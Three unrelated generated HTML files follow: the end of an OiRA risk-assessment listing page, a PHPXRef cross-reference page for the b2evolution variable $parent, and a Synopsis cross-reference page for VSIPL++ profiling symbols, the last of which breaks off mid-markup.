class="pat-select"> <select name="search-rule.date-operator:records"> <option value="equals"></option> <option value="equals-not"></option> </select> </label> <select name="search-rule.department-value:records" placeholder="Department name" class="pat-autosuggest"> <option>103, (GEPJW5W4P)</option> <option>104, (GEPJNROAL)</option> <option>105, (GEPJS5CBN)</option> <option>106, (GEPJS9JKO)</option> <option>107, (GEPJW92WQ)</option> <option>109, Milan K (H7N36URGR)</option> <option>111, (GEPJNV12M)</option> <option>140, (GEPL71JKV)</option> <option>141, (JGHN3Y100)</option> <option>142, (GEPL74BAW)</option> </select> </span> <button type="button" class="remove-clone">Rimuovi</button> </p> </template> <fieldset class="toggle-bar pat-checklist free-form"> <label class="pat-switch toggle-standard" data-pat-switch="#search-form view-extended view-compact"> <input type="radio" name="search-mode" value="standard" checked> </label> <label class="pat-switch toggle-advanced" data-pat-switch="#search-form view-compact view-extended && body osc-size-* osc-size-full"> <input type="radio" name="search-mode" value="advanced"> </label> </fieldset> </fieldset> </fieldset> </form> <div id="browser"> <ul class="departments browser" id="results"> <li class="item type-risk-assessment"> <span class="object-name field"> <a class="session-name pat-inject pat-switch" href="/preparation" data-pat-switch="selector: body; remove: focus-*; add: focus-document &amp;&amp; selector: body; remove: osc-s-*; add: osc-s-off; store: local &amp;&amp; selector: body; remove: osc-size-*; add: osc-size-normal" data-pat-inject="source: #content; target: #content; history:record ">Splash and Shine Cleaners</a> </span> <span class="last-saved meta field">Last saved <time class="pat-display-time" datetime="2020-10-30T08:00Z" data-pat-display-time="from-now: true; locale: en">19 days ago</time></span> <span class="field"></span> <span class="tool meta field">based on <a class="pat-inject pat-switch" data-pat-switch="selector: body; remove: focus-*; add: focus-document &amp;&amp; selector: body; remove: osc-s-*; add: osc-s-off; store: local &amp;&amp;selector: body; remove: osc-size-*; add: osc-size-normal" data-pat-inject="history: record" href="/index-specific-tool.html" title="EU Cleaning">EU Cleaning</a></span> <a href="/preparation.html#ra-more-menu" class="more-menu iconified icon-ellipsis pat-tooltip inactive" data-pat-tooltip="source: ajax; position-list: tl">More</a> </li> <li class="item type-risk-assessment"> <span class="object-name field"> <a class="session-name pat-inject pat-switch" href="/preparation" data-pat-switch="selector: body; remove: focus-*; add: focus-document &amp;&amp; selector: body; remove: osc-s-*; add: osc-s-off; store: local &amp;&amp; selector: body; remove: osc-size-*; add: osc-size-normal" data-pat-inject="source: #content; target: #content; history:record ">Commercial Guardinng, Leicester</a> </span> <span class="last-saved meta field">Last saved <time class="pat-display-time" datetime="2020-09-16 16:50:38.739224+02:00" data-pat-display-time="from-now: true; locale: en">2 months ago</time></span> <span class="field"></span> <span class="tool meta field">based on <a class="pat-inject pat-switch" data-pat-switch="selector: body; remove: focus-*; add: focus-document &amp;&amp; selector: body; remove: osc-s-*; add: osc-s-off; store: local &amp;&amp;selector: body; remove: osc-size-*; add: osc-size-normal" data-pat-inject="history: record" href="/index-specific-tool.html" title="Private Security EU">Private Security EU</a></span> <a href="/preparation.html#ra-more-menu" class="more-menu iconified icon-ellipsis pat-tooltip inactive" data-pat-tooltip="source: ajax; position-list: tl">More</a> </li> <li class="item type-risk-assessment"> <span class="object-name field"> <a class="session-name pat-inject pat-switch" href="/preparation" data-pat-switch="selector: body; remove: focus-*; add: focus-document &amp;&amp; selector: body; remove: osc-s-*; add: osc-s-off; store: local &amp;&amp; selector: body; remove: osc-size-*; add: osc-size-normal" data-pat-inject="source: #content; target: #content; history:record ">Private Security, Grafton Street</a> </span> <span class="last-saved meta field">Last saved <time class="pat-display-time" datetime="2020-07-16 16:50:38.739224+02:00" data-pat-display-time="from-now: true; locale: en">2 months ago</time></span> <span class="field"></span> <span class="tool meta field">based on <a class="pat-inject pat-switch" data-pat-switch="selector: body; remove: focus-*; add: focus-document &amp;&amp; selector: body; remove: osc-s-*; add: osc-s-off; store: local &amp;&amp;selector: body; remove: osc-size-*; add: osc-size-normal" data-pat-inject="history: record" href="/index-specific-tool.html" title="Private Security EU">Private Security EU</a></span> <a href="/preparation.html#ra-more-menu" class="more-menu iconified icon-ellipsis pat-tooltip inactive" data-pat-tooltip="source: ajax; position-list: tl">More</a> </li> <li class="item type-risk-assessment"> <span class="object-name field"> <a class="session-name pat-inject pat-switch" href="/preparation" data-pat-switch="selector: body; remove: focus-*; add: focus-document &amp;&amp; selector: body; remove: osc-s-*; add: osc-s-off; store: local &amp;&amp; selector: body; remove: osc-size-*; add: osc-size-normal" data-pat-inject="source: #content; target: #content; history:record ">Office operations in times of COVID-19</a> </span> <span class="last-saved meta field">Last saved <time class="pat-display-time" datetime="2020-05-03 10:31:33.134598+02:00" data-pat-display-time="from-now: true; locale: en">4 months ago</time></span> <span class="field"></span> <span class="tool meta field">based on <a class="pat-inject pat-switch" data-pat-switch="selector: body; remove: focus-*; add: focus-document &amp;&amp; selector: body; remove: osc-s-*; add: osc-s-off; store: local &amp;&amp;selector: body; remove: osc-size-*; add: osc-size-normal" data-pat-inject="history: record" href="/index-specific-tool.html" title="COVID-19">COVID-19</a></span> <a href="/preparation.html#ra-more-menu" class="more-menu iconified icon-ellipsis pat-tooltip inactive" data-pat-tooltip="source: ajax; position-list: tl">More</a> </li> </ul> </div> </div> </div> </aside> <!-- <div class="pat-modal medium panel panel-browser-warning"> <h1> Browser warning </h1> <div class="panel-body" id="modal-panel-body"> <div class="container"> <div class="browser-warning"> <div class="pat-rich"> <p class="message with-js"> You are using an outdated web browser. As a result, the site might not function as expected. Please install a newer browser in order to make optimal use of this site. </p> <p class="message without-js"> You are using an outdated web browser. Because of this you won't have an optimal experience. Please install a newer browser in order to make optimal use of this site. </p> </div> <nav class="browser-options"> <a class="icon-edge" href="https://www.microsoft.com/nl-nl/edge">Microsoft Edge</a> <a class="icon-chrome" href="https://www.google.nl/chrome/">Google Chrome</a> <a class="icon-firefox" href="https://www.mozilla.org/nl/firefox/new/">Mozilla Firefox</a> </nav> </div> <div class="button-bar"> <button class="pat-button close-panel">Close this message</button> </div> </div> </div> </div> --> </body> </html> <script>window.__patternslib_public_path__ = "/++resource++euphorie.resources/oira/script/";</script> <script src="/++resource++euphorie.resources/oira/script/polyfills-loader.js" type="text/javascript"></script>
_variables/parent.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $parent</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-print.css" type="text/css" media="print"> <style id="hilight" type="text/css"></style> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> </head> <body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff"> <table class="pagetitle" width="100%"> <tr> <td valign="top" class="pagetitle"> [ <a href="../index.html">Index</a> ] </td> <td align="right" class="pagetitle"> <h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2> </td> </tr> </table> <!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 --> <!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net --> <!-- http://phpxref.sourceforge.net/ --> <script src="../phpxref.js" type="text/javascript"></script> <script language="JavaScript" type="text/javascript"> <!-- ext='.html'; relbase='../'; subdir='_variables'; filename='index.html'; cookiekey='phpxref'; handleNavFrame(relbase, subdir, filename); logVariable('parent'); // --> </script> <script language="JavaScript" type="text/javascript"> if (gwGetCookie('xrefnav')=='off') document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>'); else document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>'); </script> <noscript> <p class="navlinks"> [ <a href="../nav.html" target="_top">Show Explorer</a> ] [ <a href="index.html" target="_top">Hide Navbar</a> ] </p> </noscript> [<a href="../index.html">Top level directory</a>]<br> <script language="JavaScript" type="text/javascript"> <!-- document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>'); document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">'); document.writeln('<tr><td class="searchbox-title">'); document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>'); document.writeln('<\/td><\/tr>'); document.writeln('<tr><td class="searchbox-body" id="searchbox-body">'); document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>'); document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: '); document.writeln('<input type="text" size=10 value="" name="classname"><br>'); document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: '); document.writeln('<input type="text" size=10 value="" name="funcname"><br>'); document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: '); document.writeln('<input type="text" size=10 value="" name="varname"><br>'); document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: '); document.writeln('<input type="text" size=10 value="" name="constname"><br>'); document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: '); document.writeln('<input type="text" size=10 value="" name="tablename"><br>'); document.writeln('<input type="submit" class="searchbox-button" value="Search">'); document.writeln('<\/form>'); document.writeln('<\/td><\/tr><\/table>'); document.writeln('<\/td><\/tr><\/table>'); // --> </script> <div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div> <h3>Variable Cross Reference</h3> <h2><a href="index.html#parent">$parent</a></h2> <b>Defined at:</b><ul> <li><a href="../rsc/js/bootstrap/bootstrap.min.js.html">/rsc/js/bootstrap/bootstrap.min.js</A> -> <a href="../rsc/js/bootstrap/bootstrap.min.js.source.html#l6"> line 6</A></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</A> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l112"> line 112</A></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</A> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l117"> line 117</A></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</A> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l227"> line 227</A></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</A> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l551"> line 551</A></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</A> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l769"> line 769</A></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</A> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l807"> line 807</A></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</A> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l834"> line 834</A></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</A> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l856"> line 856</A></li> <li><a href="../inc/_ext/xmlrpc/_xmlrpc.inc.php.html">/inc/_ext/xmlrpc/_xmlrpc.inc.php</A> -> <a href="../inc/_ext/xmlrpc/_xmlrpc.inc.php.source.html#l418"> line 418</A></li> </ul> <br><b>Referenced 63 times:</b><ul> <li><a href="../rsc/js/bootstrap/bootstrap.min.js.html">/rsc/js/bootstrap/bootstrap.min.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.min.js.source.html#l6"> line 6</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.min.js.html">/rsc/js/bootstrap/bootstrap.min.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.min.js.source.html#l6"> line 6</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.min.js.html">/rsc/js/bootstrap/bootstrap.min.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.min.js.source.html#l6"> line 6</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l112"> line 112</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l116"> line 116</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l117"> line 117</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l120"> line 120</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l124"> line 124</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l128"> line 128</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l131"> line 131</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l132"> line 132</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l227"> line 227</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l229"> line 229</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l233"> line 233</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l551"> line 551</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l577"> line 577</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l577"> line 577</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l769"> line 769</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l770"> line 770</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l775"> line 775</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l781"> line 781</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l789"> line 789</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l807"> line 807</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l808"> line 808</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l811"> line 811</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l816"> line 816</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l834"> line 834</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l837"> line 837</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l839"> line 839</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l844"> line 844</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l856"> line 856</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l858"> line 858</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l858"> line 858</a></li> <li><a href="../rsc/js/bootstrap/bootstrap.js.html">/rsc/js/bootstrap/bootstrap.js</a> -> <a href="../rsc/js/bootstrap/bootstrap.js.source.html#l858"> line 858</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/shell.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/shell.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/shell.highlighter.php.source.html#l68"> line 68</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/shell.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/shell.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/shell.highlighter.php.source.html#l70"> line 70</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/shell.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/shell.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/shell.highlighter.php.source.html#l70"> line 70</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/shell.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/shell.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/shell.highlighter.php.source.html#l113"> line 113</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/shell.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/shell.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/shell.highlighter.php.source.html#l144"> line 144</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/xml.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/xml.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/xml.highlighter.php.source.html#l48"> line 48</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/xml.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/xml.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/xml.highlighter.php.source.html#l50"> line 50</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/xml.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/xml.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/xml.highlighter.php.source.html#l50"> line 50</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/xml.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/xml.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/xml.highlighter.php.source.html#l77"> line 77</a></li> <li><a href="../inc/_ext/xmlrpc/_xmlrpc.inc.php.html">/inc/_ext/xmlrpc/_xmlrpc.inc.php</a> -> <a href="../inc/_ext/xmlrpc/_xmlrpc.inc.php.source.html#l418"> line 418</a></li> <li><a href="../inc/_ext/xmlrpc/_xmlrpc.inc.php.html">/inc/_ext/xmlrpc/_xmlrpc.inc.php</a> -> <a href="../inc/_ext/xmlrpc/_xmlrpc.inc.php.source.html#l419"> line 419</a></li> <li><a href="../inc/_ext/xmlrpc/_xmlrpc.inc.php.html">/inc/_ext/xmlrpc/_xmlrpc.inc.php</a> -> <a href="../inc/_ext/xmlrpc/_xmlrpc.inc.php.source.html#l422"> line 422</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/html.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/html.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/html.highlighter.php.source.html#l48"> line 48</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/html.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/html.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/html.highlighter.php.source.html#l50"> line 50</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/html.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/html.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/html.highlighter.php.source.html#l50"> line 50</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/html.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/html.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/html.highlighter.php.source.html#l77"> line 77</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/php.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/php.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/php.highlighter.php.source.html#l68"> line 68</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/php.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/php.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/php.highlighter.php.source.html#l70"> line 70</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/php.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/php.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/php.highlighter.php.source.html#l70"> line 70</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/php.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/php.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/php.highlighter.php.source.html#l113"> line 113</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/php.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/php.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/php.highlighter.php.source.html#l144"> line 144</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/code.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/code.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/code.highlighter.php.source.html#l56"> line 56</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/code.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/code.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/code.highlighter.php.source.html#l58"> line 58</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/code.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/code.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/code.highlighter.php.source.html#l58"> line 58</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/code.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/code.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/code.highlighter.php.source.html#l72"> line 72</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/css.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/css.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/css.highlighter.php.source.html#l47"> line 47</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/css.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/css.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/css.highlighter.php.source.html#l49"> line 49</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/css.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/css.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/css.highlighter.php.source.html#l49"> line 49</a></li> <li><a href="../plugins/code_highlight_plugin/highlighters/css.highlighter.php.html">/plugins/code_highlight_plugin/highlighters/css.highlighter.php</a> -> <a href="../plugins/code_highlight_plugin/highlighters/css.highlighter.php.source.html#l76"> line 76</a></li> </ul> <!-- A link to the phpxref site in your customized footer file is appreciated ;-) --> <br><hr> <table width="100%"> <tr><td>Generated: Sat Nov 21 22:13:19 2015</td> <td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td> </tr> </table> </body></html>
sourceryvsipl++-2.3/share/doc/sourceryvsipl++/api-reference/XRef/xref128.html
maxywb/vsipl
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <!-- XRef/xref128.html --> <!-- this view was generated by XRef --> <head> <meta content="text/html; charset=iso-8859-1" http-equiv="Content-Type"/> <title>Synopsis - Cross Reference : vsip::impl::profile::Scope_timer::~Scope_timer&#40;&#41; - vsip::impl::recv&#40;Communicator&amp;&#44;processor_type&#44;Vector&lt;T&#44;Block&gt;&#41;</title> <link href="../synopsis.css" type="text/css" rel="stylesheet"/> <script src="../synopsis.js" type="text/javascript"></script> </head> <body class="XRef" onload="load()"> <div class="navigation"> <span class="normal"><a href="../Scopes/global.html">Global Namespace</a></span> <span class="normal"><a href="../InheritanceTree.html">Inheritance Tree</a></span> <span class="normal"><a href="../InheritanceGraph.html">Inheritance Graph</a></span> <span class="normal"><a href="../NameIndex.html">Name Index</a></span> </div> <h1>Cross Reference : vsip::impl::profile::Scope_timer::~Scope_timer&#40;&#41; - vsip::impl::recv&#40;Communicator&amp;&#44;processor_type&#44;Vector&lt;T&#44;Block&gt;&#41;</h1><div class="xref-name"><a id="vsip_mimpl_mprofile_mScope_timer_m_tScope_timer_l_r"></a><h2>Destructor vsip::impl::profile::Scope_timer::~Scope_timer&#40;&#41;</h2><ul> <li><a href="../Scopes/vsip/impl/profile/Scope_timer.html#_tScope_timer_l_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/opt/profile.hpp.html#661">vsip/opt/profile.hpp:661</a>: in class <a href="../Scopes/vsip/impl/profile/Scope_timer.html">vsip::impl::profile::Scope_timer</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mTime_in_scope"></a><h2>Typedef vsip::impl::profile::Time_in_scope</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#Time_in_scope">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/opt/profile.hpp.html#668">vsip/opt/profile.hpp:668</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mTimer"></a><h2>Typedef vsip::impl::profile::Timer</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#Timer">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/opt/profile.hpp.html#458">vsip/opt/profile.hpp:458</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mall"></a><h2>Enumerator vsip::impl::profile::all</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#all">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/profile.hpp.html#107">vsip/core/profile.hpp:107</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mdispatch"></a><h2>Enumerator vsip::impl::profile::dispatch</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#dispatch">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/profile.hpp.html#97">vsip/core/profile.hpp:97</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> <li>Referenced from: <ul> <li><a href="../Source/vsip/opt/expr/assign.hpp.html#221">vsip/opt/expr/assign.hpp:221</a>: in vsip_csl::dispatcher::Profile_feature&lt;op::assign&gt;</li> <li><a href="../Source/vsip/opt/expr/assign.hpp.html#229">vsip/opt/expr/assign.hpp:229</a>: in vsip_csl::dispatcher::Profile_policy&lt;op::assign&#44;void&#40;&#41;&#40;LHS&amp;&#44;const RHS&amp;&#41;&#44;B&gt;</li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mevent_lconst.std_mstring_A_cint_r"></a><h2>vsip::impl::profile::event&#40;const std::string&amp;&#44;int&#41;</h2><ul> <li>Defined at: <ul> <li><a href="../Source/vsip/core/profile.hpp.html#111">vsip/core/profile.hpp:111</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> <li>Called from: <ul> <li><a 